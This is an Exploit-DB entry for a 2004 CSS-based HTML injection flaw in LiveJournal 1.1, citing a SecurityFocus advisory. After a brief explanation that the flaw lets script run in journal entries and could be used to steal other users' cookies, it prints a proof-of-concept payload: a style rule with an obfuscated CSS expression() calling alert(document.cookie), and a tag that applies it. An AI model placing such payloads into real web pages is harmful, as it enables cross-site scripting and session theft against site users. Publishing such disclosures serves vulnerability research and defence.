LiveJournal 1.1 - CSS HTML Injection

EDB-ID:

23749

CVE:

N/A

EDB Verified:

Author:

Michael Scovetta

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2004-02-23

Vulnerable App:

source: https://www.securityfocus.com/bid/9727/info

LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet (CSS) tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability. 

This could potentially be exploited to steal cookies from other site users. Other attacks are also possible.

<style>
.test1 { color:e\xpression(alert(document.cookie)); }
</style>

<a class="test1">foo</a>

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services